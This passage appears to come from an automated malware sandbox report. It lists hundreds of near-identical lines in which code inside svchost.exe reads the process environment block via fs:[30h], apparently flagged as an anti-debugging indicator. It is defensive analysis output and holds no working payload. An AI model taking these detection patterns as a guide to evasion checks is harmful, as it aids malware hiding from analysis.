                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF3E6 mov eax, dword ptr fs:[00000030h]1_2_036EF3E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037053FC mov eax, dword ptr fs:[00000030h]1_2_037053FC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]1_2_036EB3D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036533A5 mov eax, dword ptr fs:[00000030h]1_2_036533A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]1_2_036633A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036633A0 mov eax, dword ptr fs:[00000030h]1_2_036633A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370539D mov eax, dword ptr fs:[00000030h]1_2_0370539D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A mov eax, dword ptr fs:[00000030h]1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]1_2_036FD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FD26B mov eax, dword ptr fs:[00000030h]1_2_036FD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03659274 mov eax, dword ptr fs:[00000030h]1_2_03659274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]1_2_03671270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03671270 mov eax, dword ptr fs:[00000030h]1_2_03671270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]1_2_03629240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629240 mov eax, dword ptr fs:[00000030h]1_2_03629240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366724D mov eax, dword ptr fs:[00000030h]1_2_0366724D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]1_2_036EB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EB256 mov eax, dword ptr fs:[00000030h]1_2_036EB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705227 mov eax, dword ptr fs:[00000030h]1_2_03705227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]1_2_03667208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03667208 mov eax, dword ptr fs:[00000030h]1_2_03667208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED mov eax, dword ptr fs:[00000030h]1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037052E2 mov eax, dword ptr fs:[00000030h]1_2_037052E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF2F8 mov eax, dword ptr fs:[00000030h]1_2_036EF2F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036292FF mov eax, dword ptr fs:[00000030h]1_2_036292FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]1_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]1_2_036392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]1_2_036392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]1_2_0362B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]1_2_0362B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]1_2_0362B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]1_2_0365F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]1_2_0365F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]1_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]1_2_036F92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]1_2_036C72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]1_2_036C72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]1_2_036B92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705283 mov eax, dword ptr fs:[00000030h]1_2_03705283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]1_2_0366329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]1_2_0366329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]1_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C9179 mov eax, dword ptr fs:[00000030h]1_2_036C9179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705152 mov eax, dword ptr fs:[00000030h]1_2_03705152
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]1_2_03629148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03637152 mov eax, dword ptr fs:[00000030h]1_2_03637152
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]1_2_03631131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]1_2_03631131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]1_2_0362B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]1_2_036551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036351ED mov eax, dword ptr fs:[00000030h]1_2_036351ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D71F9 mov esi, dword ptr fs:[00000030h]1_2_036D71F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366D1D0 mov eax, dword ptr fs:[00000030h]1_2_0366D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]1_2_0366D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037051CB mov eax, dword ptr fs:[00000030h]1_2_037051CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]1_2_036E11A4
